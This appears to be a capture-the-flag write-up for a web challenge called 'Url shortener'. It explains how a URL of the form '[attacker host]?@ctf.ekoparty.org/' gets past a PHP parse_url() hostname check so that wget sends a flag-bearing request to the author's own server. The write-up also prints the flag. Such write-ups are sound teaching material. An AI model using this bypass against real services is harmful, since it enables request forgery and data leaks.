Rating: 0

Url shortener
(web, 200 points)

"We developed this url shortener, it will allow you to share links with your friends!"

http://9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site:20000/

Hint
You will need to bypass the check for the hostname and send the request somewhere else!
Source code: https://paste.null-life.com/#/sGv1ZrIyhAAYCQMa6p8UFm2IFvzZhJ9yAYtkHgCcCz7bu8YE/66lTyw0

Solution:

This one had me banging my head off the wall a bit. Basically the header request that this website sends out contains the flag in the user-agent field (as we can see in the source), so we need to get the URL shortener to call "wget" to something we can control so we can see the header. However, the script checks the host that it's sending to via parse_url(). What we basically need to do is fool out parse_url()["host"] so that it gives "ctf.ekoparty.org" while at the same time making the wget go to our custom website rather than ctf.ekoparty.org. I was thinking using control characters such as the null byte as I'd seen it being used in exploits before regarding parse_url(), but it lead nowhere. Zi pointed out to me an old phishers trick, which was to use the username and password parts of the URL to fool it.

Through tinkering around and much help from zi after frustration, it seemed "?" terminated the URL for wget, but not for parse_url(). We can use "@" in the old phishing technique to fool parse_url() to believe that our host is ctf.ekoparty.org, when we're actually sending wget to our custom site. I then just sent it to my custom server and looked in the apache access.log for the header, where the flag was found in the user agent section of the HTTP header. We'll spend a lot more time on this blog talking about how terrible I mean great PHP is for security, especially when I do 0x0539 write-ups in the future.

Injection string: http://[WEBSITE OR IP]?@ctf.ekoparty.org/

Flag: EKO{follow_the_rfc_rabbit}